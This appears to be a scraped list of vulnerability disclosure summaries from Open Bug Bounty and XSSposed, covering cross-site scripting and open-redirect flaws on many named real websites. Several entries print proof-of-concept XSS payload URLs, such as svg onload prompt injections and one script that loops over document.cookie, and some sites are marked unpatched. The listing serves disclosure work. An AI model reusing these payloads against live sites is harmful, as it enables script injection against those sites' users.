flooble.com Cross Site Scripting vulnerability OBB-2830106

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

coolpon.com.tw Cross Site Scripting vulnerability OBB-2129625

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: &nbsp&nbsp&nbsp&nbsp&nbsp&nbspa. verified the vulnerability and confirmed its existence; &nbsp&nbsp&nbsp&nbsp&nbsp&nbspb. notified the website operator about its existence...

groupauto.co.uk Cross Site Scripting vulnerability

Open Bug Bounty ID: OBB-952088 Security Researcher AbhishekZaveri9 Helped patch 14 vulnerabilities Received 1 Coordinated Disclosure badges , a holder of 1 badges for responsible and coordinated disclosure, found a security vulnerability affecting groupauto.co.uk website and its users. Following...

walkrys-security.pl XSS vulnerability

Open Bug Bounty ID: OBB-713330 Description| Value ---|--- Affected Website:| walkrys-security.pl Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| hidden until disclosure Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:|...

zoobest.de XSS vulnerability

Open Bug Bounty ID: OBB-441195 Description| Value ---|--- Affected Website:| zoobest.de Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

secure.fantasypros.com XSS vulnerability

Vulnerable URL: https://secure.fantasypros.com/plans/?sport=nba=dw%22%3E%3Csvg/onload=prompt5%3E Details: Description| Value ---|--- Patched:| Yes, at 16.01.2018 Latest check for patch:| 16.01.2018 20:48 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown /...

lutonairporttaxis.co.uk XSS vulnerability

Vulnerable URL: https://lutonairporttaxis.co.uk/book-now/?fromlocation="--!"location=id=ofpassengers= Details: Description| Value ---|--- Patched:| No Latest check for patch:| 28.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 4137314 VIP website status:| No...

vwo.com XSS vulnerability

Vulnerable URL: https://vwo.com/blog/?s=" Details: Description| Value ---|--- Patched:| Yes, at 01.12.2016 Latest check for patch:| 01.12.2016 12:14 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 26832 VIP website status:| Yes Coordinated Disclosure Timeline:...

injuryattorneysac.com XSS vulnerability

Vulnerable URL: http://injuryattorneysac.com/users/editorialdisp.php?mn="=services Details: Description| Value ---|--- Patched:| Yes, at 25.11.2017 Latest check for patch:| 25.11.2017 09:20 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 25795795 VIP website...

cronica.com.mx XSS vulnerability

Vulnerable URL: http://www.cronica.com.mx/buscar.php?busca=" Details: Description| Value ---|--- Patched:| No Latest check for patch:| 27.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 53215 VIP website status:| No Check cronica.com.mx SSL connection:| Grad...

ksbm.oeaw.ac.at XSS vulnerability

Vulnerable URL: http://www.ksbm.oeaw.ac.at/scripts/php/BR.php?lang=de" Details: Description| Value ---|--- Patched:| Yes, at 12.01.2017 Latest check for patch:| 12.01.2017 14:24 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated VIP website...

OLX: full path disclosure vulnerability at https://security.olx.com/*

in form of html comment it disclosing full path of file name Security.html in all https://security.olx.com/ links...

treeworksinc.com XSS vulnerability

Vulnerable URL: http://www.treeworksinc.com/wp-content/plugins/simple-flash-video/video.php?filename=%3C/script/%22--%3E%3Csvg/onload=prompt%28/OPENBUGBOUNTY/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 27.07.2017 Latest check for patch:| 27.07.2017 09:21 GMT Vulnerability type:|...

pacificbindery.com XSS vulnerability

Vulnerable URL: http://www.pacificbindery.com/?p2=1%22--%3E%3C/script%3E%3Csvg/onload=%27;alert%28/OPENBUGBOUNTY/%29;%27%3Emodules/blog/viewcomments.jsp=1 Details: Description| Value ---|--- Patched:| Yes, at 18.06.2017 Latest check for patch:| 18.06.2017 15:52 GMT Vulnerability type:| XSS...

welivehere.eu Open Redirect vulnerability

Vulnerable URL: http://welivehere.eu/phpmv2/phpmyvisites.php?url=http://www.xssposed.org/=42&%20pagename=FILE:OpenRedirect%20/XSSPOSED Details: Description| Value ---|--- Patched:| No Latest check for patch:| 26.07.2017 Vulnerability type:| Open Redirect Vulnerability status:| Publicly disclosed...

music.naij.com XSS vulnerability

Vulnerable URL: http://music.naij.com/search?q=%22%3E%3Cscript%3Efor+%28%3B%3B%29+prompt%28document.cookie%29%3B+%3C%2Fscript%3E Details: Description| Value ---|--- Patched:| Yes, at 26.07.2017 Latest check for patch:| 26.07.2017 21:34 GMT Vulnerability type:| XSS Vulnerability status:| Publicly...

vivitarcorp.com XSS vulnerability

Vulnerable URL: http://www.vivitarcorp.com/?domain=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 03.03.2016 Latest check for patch:| 03.03.2016 02:17 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown /...

infants.com XSS vulnerability

Vulnerable URL: http://www.infants.com/?notfound=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 22.02.2016 Latest check for patch:| 22.02.2016 13:09 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / No...

malaya.com XSS vulnerability

Vulnerable URL: http://www.malaya.com/?notfound=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 22.02.2016 Latest check for patch:| 22.02.2016 13:40 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 12482448 Goog...

curtain.com XSS vulnerability

Vulnerable URL: http://www.curtain.com/?notfound=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 22.02.2016 Latest check for patch:| 22.02.2016 14:33 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 18794365...